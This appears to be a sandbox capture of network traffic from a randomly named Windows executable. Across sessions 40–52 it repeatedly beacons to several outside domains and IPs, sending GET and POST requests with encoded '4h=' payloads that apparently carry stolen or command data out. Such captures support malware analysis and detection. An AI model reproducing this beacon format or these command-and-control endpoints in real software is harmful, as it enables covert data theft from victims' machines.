                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBrLkTeeg6qFXua2dsx%2FGlJISdSImLL%2BPur5cSMbQ5t%2FZt4N3X%2FlED6FaPPjM43i9DiEg1AC1oEj%2B8ZTFQU3pb1Zh644lLEo6ElOgfUJGu%2F7RR0EASp%2BhEAxY91W5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d56ee697c90-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  40 | 192.168.2.7 | 49751 | 188.114.96.3 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:36.012903929 CEST | 482 | OUT | GET /yfa0/?4h=0WhDsKDlEsw2U2hGDN8VHtGa3OHmwnAep36jQbkxMA/yUt9OY1uk5sHeApFDjZn3CMzAWurlvftixp+c+vBUGrqZNxyLTULtMs5Dxygy6ogz213YpKfivi2Kz6VhB8QL1f0m+iF6WOns&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:36.617582083 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFeDM6TgFXoepX1YMGPnwVIhFH0Yd%2BuG2A%2BwjOaLEvdPivlj1HyeHxm40o6D4ps2n0uRTi%2B2jHgcTUL1RyxQ58Tz%2BTxbM6CyXKO%2FqvK%2BjCcyBv3w6PAPMdKHpSIOZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d67aed45e68-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Ascii: 31d<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><scrip
                                  May 27, 2024 12:36:36.617594004 CEST | 172 | IN |
                                  Data Ascii: t language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  41 | 192.168.2.7 | 49752 | 45.64.187.212 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:43.328705072 CEST | 763 | OUT | POST /w912/ HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kernelphysics.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kernelphysics.com/w912/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=ibiz3xQMXzJf2L4zgN6/G1A04xzFsoYCTnquFw/KVftx9zLRLGYYsRIjvnO1cjpg6/DMGk+RYQw5RrG2hUOfIehH0q/Vtu0WqjftYhVGyMH/fj9ryEI6xhJ6ncF8oSYccYwRqLhDeyz550UjoVsUqHP7f5aGgeldutkO7+uTWRdql8zAxuIEYy1m/K1AoTxtGSltTw+dEuhAEyDH+g==
                                  May 27, 2024 12:36:44.435375929 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:44 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"
                                  Server: Nginx_Rc-Cr
                                  Content-Encoding: br


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  42 | 192.168.2.7 | 49753 | 45.64.187.212 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:45.867072105 CEST | 783 | OUT | POST /w912/ HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kernelphysics.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kernelphysics.com/w912/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=ibiz3xQMXzJf0rIztOi/BVA3kBzFlIYGTnmuFwWVVtJxzy7RKHYYtRIj2XOwYjp76/PEGlCRYQ05Rq22hDacJOhF/K/Xy+0WqjftYhAtyNj/fztrg1Il8BJ5mcF8+SYYcYx2qPppe3355xojoG0bzXP9RZbLnOgnhvY33IvKPhAJgKuirMEoGjNd7IR2/1sYETh1eSK8bZEqJgiDoRbM/YpiVG/J/Ds2ChvdWH8=
                                  May 27, 2024 12:36:46.976382971 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"
                                  Server: Nginx_Rc-Cr
                                  Content-Encoding: br


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  43 | 192.168.2.7 | 49754 | 45.64.187.212 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:48.405726910 CEST | 1796 | OUT | POST /w912/ HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kernelphysics.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kernelphysics.com/w912/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:49.502720118 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"
                                  Server: Nginx_Rc-Cr
                                  Content-Encoding: br


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  44 | 192.168.2.7 | 49755 | 45.64.187.212 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:50.953716040 CEST | 492 | OUT | GET /w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:52.011612892 CEST | 540 | IN | HTTP/1.1 301 Moved Permanently
                                  Date: Mon, 27 May 2024 10:36:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: close
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  X-Redirect-By: WordPress
                                  Location: http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y
                                  Server: Nginx_Rc-Cr
                                  etag: on
                                  X-Cache-Status: BYPASS - 15m desktop


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  45 | 192.168.2.7 | 49756 | 194.58.112.174 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:57.157707930 CEST | 760 | OUT | POST /zxqv/ HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.theppelin.online
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.theppelin.online/zxqv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=DsP9HAfhsOxX7OlmorTZ0NpVMO3jmuMBhH8jMZ7LAay/deT6X8sZnlg8mierwERvYkcV1WLTtqemwdYfKN85QBb1csQv4grag0WwXFjQtqLoGkMUroDiXrRPiM8Ue/X3/s0eS5xVMN2+//kW4AONHV+SI+ak+/WmdTPDY0OFolOjYWeNrpJo2UIR4YqoLK09Ntab/VD8gssrg03AOQ==
                                  May 27, 2024 12:36:57.872515917 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:36:57 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  46 | 192.168.2.7 | 49757 | 194.58.112.174 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:59.718074083 CEST | 780 | OUT | POST /zxqv/ HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.theppelin.online
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.theppelin.online/zxqv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=DsP9HAfhsOxX5u1mvMnZkdpWAu3jvOM7hH4jMY/lBoW/E6X6W5AZglg8hSeut0R0YkQd1XnTtqKmwYkfKeU+WRbzH8Qt3Arag0WwXF2YtrvoGQIUkq7hUrRM088UPPXJ/s0GS8o+MIq+/98W/ROOOV/ZVObt7eHeaC/QXmTcqkayUADvxLFEoFwq8aOecspIPseDy33d/bJBtmWEYpneQXacgyfjRpLH8iGj6xM=
                                  May 27, 2024 12:37:00.435714960 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:37:00 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  47 | 192.168.2.7 | 49758 | 194.58.112.174 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:03.757096052 CEST | 1793 | OUT | POST /zxqv/ HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.theppelin.online
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.theppelin.online/zxqv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:04.506792068 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:37:04 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  48 | 192.168.2.7 | 49759 | 194.58.112.174 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:06.291560888 CEST | 491 | OUT | GET /zxqv/?4h=OundE2exmel4zoR2h8DaiP5rA6rWpfsTmCodHa3wAeftE7HOQeIovEJMwiGRwn5EG1Ay+Vr7sNzWsvI7Z9ouBjSqQ9kX1TTXpDayR3bilNm8LgIuib/ea4tO/6BxMsTG0spQdKgoBIvM&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:07.002167940 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:37:06 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  49 | 192.168.2.7 | 49760 | 216.40.34.41 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:12.314450026 CEST | 748 | OUT | POST /xvcs/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.botcsllc.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.botcsllc.com/xvcs/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=P/gY/lwxLhmFZgYheR8uT9FJch66ceC29FRC4ceboopq/rpCU3DEYKIVw3DdtaBBSUwK2/9gEn5xqBhJvTwE4Bmf6LJdO/dj2oAHKWq90KavDfSxNbHmwPlAT8se9G7LTeA/DgFgVACV+35skj/fYqNT8hrREYlCouOLrbJEF+Bec155U4QK+rMuIQP3botCVtN36nUp/qlBoeuqhg==
                                  May 27, 2024 12:37:12.848577976 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 1bdc198a-460a-4c1b-9118-0ce778869a37
                                  x-runtime: 0.040465
                                  content-length: 18203
                                  connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  50 | 192.168.2.7 | 49761 | 216.40.34.41 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:14.857673883 CEST | 768 | OUT | POST /xvcs/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.botcsllc.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.botcsllc.com/xvcs/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=P/gY/lwxLhmFLxohcykub9FGTB66GuCy9FdC4daLpaNq/JhCGmDEZKIV+XDUwKB8SUt/29pgEn9xqARJvgIDpBmdhbJfDfdj2oAHKWuT0KSvCruxM6Hpv/lDW8se3m7PTeARDlleVC6V+2pskRHQWqNR4hq7K4kWyNCqy6FYPcJnZDkbOacmg60VMSrBMOw3XsJv3FgIgdArlMPu3aq2/11Pb3IrYi8n46UTzKc=
                                  May 27, 2024 12:37:15.391094923 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: f72fe0f9-86e2-472b-a04f-c43667e0c781
                                  x-runtime: 0.053112
                                  content-length: 18223
                                  connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  51 | 192.168.2.7 | 49762 | 216.40.34.41 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:17.382560968 CEST | 1781 | OUT | POST /xvcs/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.botcsllc.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.botcsllc.com/xvcs/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:17.893853903 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: f2e0e0ec-15a0-4978-b37b-d5884e64b2a4
                                  x-runtime: 0.021172
                                  content-length: 19235
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:37:17.893867016 CEST | 1236 | IN
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:37:17.893887997 CEST | 1236 | IN
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:37:17.893901110 CEST | 1236 | IN
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:37:17.893918037 CEST | 1236 | IN
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 27, 2024 12:37:17.893927097 CEST | 1236 | IN
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 27, 2024 12:37:17.893945932 CEST | 1236 | IN
                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                  May 27, 2024 12:37:17.893964052 CEST | 1236 | IN
                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                  May 27, 2024 12:37:17.893978119 CEST | 1236 | IN
                                  Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                  May 27, 2024 12:37:17.893995047 CEST | 1236 | IN
                                  Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                  May 27, 2024 12:37:17.899312973 CEST | 672 | IN
                                  Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  52 | 192.168.2.7 | 49763 | 216.40.34.41 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:37:21.241363049 CEST | 487 | OUT | GET /xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:21.735172033 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-download-options: noopen
                                  x-permitted-cross-domain-policies: none
                                  referrer-policy: strict-origin-when-cross-origin
                                  content-type: text/html; charset=utf-8
                                  etag: W/"716ddccefe706082230daa01e9261cc7"
                                  cache-control: max-age=0, private, must-revalidate
                                  x-request-id: 36fdb5af-11c3-422b-bdcf-c09c93a5d5d1
                                  x-runtime: 0.004403
                                  transfer-encoding: chunked
                                  connection: close
                                  Data Ascii: 17DC<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>botcsllc.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired">
